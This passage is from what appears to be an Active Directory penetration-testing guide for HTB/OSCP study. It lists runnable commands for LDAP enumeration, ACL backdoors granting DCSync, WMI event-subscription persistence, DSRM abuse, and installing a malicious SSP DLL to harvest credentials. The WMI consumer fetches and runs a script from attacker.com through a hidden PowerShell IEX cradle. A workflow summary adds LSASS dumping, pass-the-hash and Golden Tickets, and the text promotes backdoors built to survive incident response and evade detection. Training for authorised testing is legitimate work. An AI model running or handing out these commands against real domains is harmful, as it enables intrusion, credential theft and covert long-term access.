dsquery * -filter "(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*))" # Kerberoastable users
dsquery * -filter "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" # ASREPRoastable users
# LDAP enumeration from Linux
# Using ldapsearch
ldapsearch -x -H ldap://dc01.domain.local -D "domain\user" -w "password" -b "DC=domain,DC=local" "objectClass=user" samAccountName
# Anonymous LDAP enumeration (if allowed)
ldapsearch -x -H ldap://dc01.domain.local -b "DC=domain,DC=local" "objectClass=user" samAccountName
# Specific LDAP attribute queries
ldapsearch -x -H ldap://dc01.domain.local -D "domain\user" -w "password" -b "DC=domain,DC=local" "objectClass=user" samAccountName userAccountControl adminCount
# LDAP enumeration with Python
import ldap3
server = ldap3.Server('dc01.domain.local')
conn = ldap3.Connection(server, user='domain\\user', password='password')
conn.bind()
conn.search('DC=domain,DC=local', '(objectClass=user)', attributes=['samAccountName', 'adminCount'])
# Why LDAP enumeration is important:
# - Direct access to AD database
# - Custom queries for specific information
# - Cross-platform compatibility
# - Granular attribute access
# - Foundation for advanced attacks
Domain Persistence and Backdoors
Advanced Backdoor Techniques
What advanced AD backdoors involve: Sophisticated persistence mechanisms that survive typical security improvements and incident response efforts.
# ACL-based backdoors
# Modify object permissions to grant persistent access
# Using PowerView
Add-ObjectAcl -TargetDistinguishedName "DC=domain,DC=local" -PrincipalSamAccountName backdooruser -Rights DCSync
Add-ObjectAcl -TargetDistinguishedName "CN=Domain Admins,CN=Users,DC=domain,DC=local" -PrincipalSamAccountName backdooruser -Rights WriteMembers
# Certificate-based persistence
# Request certificates for long-term authentication
# Using certreq or PowerShell
$cert = Get-Certificate -Template User -CertStoreLocation Cert:\CurrentUser\My
# Use certificate for authentication after password changes
# WMI event subscription backdoors
# Create persistent WMI event subscriptions
$filter = Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{
Name="PersistentFilter";
EventNameSpace="root\cimv2";
QueryLanguage="WQL";
Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfRawData_PerfOS_System' AND TargetInstance.SystemUpTime >= 200 AND TargetInstance.SystemUpTime < 360"
}
$consumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\subscription" -Arguments @{
Name="PersistentConsumer";
CommandLineTemplate="powershell.exe -WindowStyle Hidden -c IEX(New-Object Net.WebClient).downloadString('http://attacker.com/backdoor.ps1')"
}
Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{
Filter=$filter;
Consumer=$consumer
}
# DSRM password backdoors
# Modify DSRM account for persistence on domain controllers
# Enable DSRM logon over network
reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v DsrmAdminLogonBehavior /t REG_DWORD /d 2 /f
# Security Support Provider (SSP) backdoors
# Install custom SSP for credential harvesting
copy malicious_ssp.dll C:\Windows\System32\
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "Security Packages" /d "kerberos msv1_0 schannel wdigest tspkg pku2u malicious_ssp" /t REG_MULTI_SZ /f
# Why advanced backdoors are necessary:
# - Survive standard incident response procedures
# - Provide multiple re-entry vectors
# - Operate below typical detection thresholds
# - Maintain access through security improvements
# - Enable long-term intelligence gathering
Active Directory Attack Methodology Summary
HTB/OSCP Active Directory Workflow
Systematic approach for AD compromise:
- Initial Domain Enumeration
- Identify domain structure and relationships
- Enumerate users, groups, and computers
- Map trust relationships and permissions
-
Identify high-value targets and attack paths
-
Credential Acquisition Phase
- Kerberoasting for service account passwords
- ASREPRoasting for accounts without preauthentication
- LSASS memory dumping for cached credentials
-
NTDS.dit extraction from domain controllers
-
Lateral Movement Execution
- Pass the Hash for NTLM authentication
- Pass the Ticket for Kerberos authentication
- Overpass the Hash for mixed environments
-
Token impersonation and delegation abuse
-
Privilege Escalation
- BloodHound path analysis for escalation routes
- ACL abuse for permission modification
- Group membership manipulation
-
Service account privilege exploitation
-
Domain Persistence
- Golden Ticket creation for ultimate persistence
- Silver Tickets for service-specific access
- DCSync capabilities for credential extraction
- Advanced backdoors for long-term access
Key Success Factors for HTB/OSCP AD Attacks:
Technical Mastery:
- BloodHound proficiency - Essential for attack path identification
- Kerberos understanding - Critical for advanced attacks
- PowerShell skills - Native AD enumeration and exploitation
- Cross-platform tools - Impacket suite for Linux-based attacks
Methodology Excellence:
- Systematic enumeration - Don't miss critical information
- Attack path planning - Use BloodHound for optimal routes
- Credential management - Organize and leverage all discovered credentials
- Persistence establishment - Multiple methods for continued access
Common AD Attack Mistakes to Avoid:
- Insufficient initial enumeration
- Focusing only on password attacks
- Ignoring trust relationships
- Not establishing proper persistence
- Poor operational security in domain environments
Advanced Techniques for Complex AD Scenarios:
- Multi-forest environments - Trust relationship exploitation
- Hybrid cloud integration - Azure AD and on-premises integration
- Certificate-based attacks - ADCS exploitation and abuse
- Constrained delegation - Advanced Kerberos delegation attacks
This Active Directory attack methodology provides comprehensive coverage of techniques essential for modern enterprise penetration testing, HTB challenges, and OSCP exam scenarios. The systematic approach ensures thorough domain compromise while maintaining operational security and establishing persistent access for ongoing operations.
Last updated: 2025-08-26 20:00 UTC